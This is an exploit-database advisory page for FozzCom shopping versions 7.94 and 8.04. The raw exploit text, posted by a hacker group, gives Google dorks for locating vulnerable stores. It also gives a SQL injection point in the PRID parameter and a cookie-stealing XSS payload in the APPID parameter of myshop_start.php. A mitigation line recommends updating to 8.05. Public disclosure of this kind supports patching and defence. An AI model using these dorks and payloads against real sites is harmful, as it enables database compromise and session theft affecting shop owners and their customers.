header-logo
Suggest Exploit
vendor:
Shopping
by:
Dr.0rYX and Cr3w-DZ
8,8
CVSS
HIGH
Multiple Remote Vulnerabilities
89, 200, 264, 287, 643, 664
CWE
Product Name: Shopping
Affected Version From: 7.94
Affected Version To: 8.04
Patch Exists: YES
Related CWE: N/A
CPE: a:fozzcom:shopping
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

FozzCom shopping<= 7.94+8.04 Multiple Remote Vulnerabilities

Multiple vulnerabilities have been discovered in FozzCom shopping, which can be exploited by malicious people to conduct SQL injection attacks, disclose sensitive information, bypass certain security restrictions, and potentially compromise a vulnerable system.

Mitigation:

Update to version 8.05 or later, where available.
Source

Exploit-DB raw data:

 
 Exploit Title:FozzCom shopping<= 7.94+8.04  Multiple Remote Vulnerabilities  
 Date: 12.10.2010  
 Author: Dr.0rYX and Cr3w-DZ  
 Category: webapps/0day  
 Version: 7.94+8.04  

****************************************************************************************************
*           _______       ___________.__                     ___________      .__                  *
*      ____ \   _  \______\__    ___/|  |__           _____  \_   _____/______|__| ____ _____      *
*     /    \/  /_\  \_  __ \|    |   |  |  \   ______ \__  \  |    __) \_  __ \  |/ ___\\__  \     *
*    |   |  \  \_/   \  | \/|    |   |   Y  \ /_____/  / __ \_|     \   |  | \/  \  \___ / __ \_   *
*    |___|  /\_____  /__|   |____|   |___|  /         (____  /\___  /   |__|  |__|\___  >____  /   *
*         \/       \/                     \/               \/     \/                  \/     \/    *
*                                      .__  __             __                                      *
*      ______ ____   ____  __ _________|__|/  |_ ___.__. _/  |_  ____ _____    _____               *
*     /  ___// __ \_/ ___\|  |  \_  __ \  \   __<   |  | \   __\/ __ \\__  \  /     \              *
*     \___ \\  ___/\  \___|  |  /|  | \/  ||  |  \___  |  |  | \  ___/ / __ \|  Y Y  \             *
*    /____  >\___  >\___  >____/ |__|  |__||__|  / ____|  |__|  \___  >____  /__|_|  /             *
*         \/     \/     \/                       \/                 \/     \/      \/              *
*                                                        Pr!v8 Expl0iT AND t00l **                 *                                                                  
*                                      ALGERIAN HACKERS                                            *      
*********************************- NORTH-AFRICA SECURITY TEAM -*************************************
 
[!]            FozzCom shopping<= 7.94+8.04  Multiple Remote Vulnerabilities 
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>  &  Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
 
***************************************************************************/
[!] notice :
 Dr.0rYX:  MY OLD EMAIL VX3@HOTMAIL.DE  CLOSED
           MY NEW EMAIL IS  SNIPER-DZ@HOTMAIL.DE

***************************************************************************/
[ Software Information ]
 
[+] Vendor   : http://www.fozztech.se
[+] script   : FozzCom shopping
[+] Download : http://www.fozztech.se (sell script )
[+] Vulnerability : SQL injection Vulnerability
                    xss Vulnerability
[+] Dork : inurl:"myshop_start.php?APPID="
[+] Dork :  allintext:"Powered by FozzCom."
 
**************************************************************************/
[ Vulnerable File 1]
 
http://server/[path]/myshop_start.php?APPID=2&PRID=sql[N.A.S.T ]

[ Exploit 1 ]
 
http://server/myshop/myshop_start.php?APPID=2&PRID= SQL INJECTION 


*************************************************************************/
[ Vulnerable File 2]

http://server/[path]/myshop_start.php?APPID=xss[N.A.S.T ]

[ Exploit 2 ]
http://www.server/myshop/myshop_start.php?APPID='><script>alert(document.cookie)</script>

[  GReet ]
 
[+] : Exploit-db.com , v4-team.com

Navigation

Suggest Exploit

Services By CQR